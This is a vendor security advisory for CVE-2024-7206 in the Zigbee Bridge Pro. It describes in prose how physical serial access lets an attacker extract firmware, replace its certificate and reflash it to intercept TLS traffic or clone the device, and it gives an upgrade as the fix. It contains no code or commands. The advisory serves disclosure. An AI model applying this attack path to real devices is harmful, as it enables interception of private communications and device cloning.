Menu
Security Advisory – Firmware extraction and Hardware SSL Pinning Bypass
| Title | Security Advisory – Firmware extraction and Hardware SSL Pinning Bypass |
|---|---|
| Release Date | 8/10/2024 |
| Abstract | An attacker can extract the firmware and can analyze the firmware to further exploit other vulnerabilities such as • Decrypt TLS communication of device and cloud. • Extract secrets to clone the device. cveid:CVE-2024-7206 |
| Affected Product | Zigbee Bridge Pro |
| Affected Version | 2.0.0 and before |
| Impact | Attackers can use this vulnerability to decrypt the interaction information between the device and the service, analyze the behavior of the device, and obtain the private information of the hardware, so as to further attack the device, such as cloning the device. |
| Technical Details | Exploitation Preconditions: 1、Disassemble the device. 2、Connect the device to the pc through the serial port. Technical Details: After the attacker connects the device, the firmware can be exported through the tool. By analyzing the firmware binary content, the attacker can modify the firmware content to replace the certificate with the one signed by the attacker. The firmware is then repackaged and written to the device, enabling man-in-the-middle hijacking and obtaining the encrypted content of the interaction between the device and the server. |
| Resolution | Upgrade to firmware 2.1.0 and above |